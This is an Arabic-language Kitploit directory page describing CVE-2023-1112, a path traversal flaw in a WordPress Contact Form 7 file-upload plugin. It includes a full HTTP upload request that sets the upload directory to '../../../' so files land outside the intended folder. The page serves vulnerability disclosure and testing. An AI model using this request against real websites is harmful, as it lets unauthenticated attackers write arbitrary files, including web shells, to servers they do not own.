Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal — Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 اجتياز المسار (CVE-2023-1112) | Kitploit
أدوات/GitHubGitHub/nickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقسوء التكوين
GitHubnickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal

Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal

Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 اجتياز المسار (CVE-2023-1112)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
231منذ 3 سنواتتمت المراجعة من قبل Kitploit

CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 تجاوز المسار

معلومات

تجاوز المسار في Drag and Drop Multiple File Uploader PRO - Contact Form 7 الإصدار 5.0.6.1 يسمح لمهاجم عن بُعد غير مصادَق برفع الملفات إلى أي مكان قابل للكتابة على الخادم البعيد (CVE-2023-1112).

لاستغلال هذه الثغرة، يحتاج المهاجم إلى رفع ملف باستخدام نموذج الإضافة. في هذا الطلب يجب أن يكون هناك المعامل upload_name، الذي تكون قيمته اسم المجلد الذي سيُرفع إليه الملف. يمكن للمهاجم وضع أي شيء يريده، مثل ../، ../../../، foldername (سيُنشئ مجلد "foldername" في دليل الرفع)، إلخ.

مثال

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

لقطات الشاشة

طلب عادي

image

طلب خبيث

image

نجح الطلب الخبيث في رفع الملف إلى جذر خادم الويب

image

تنزيل الأداة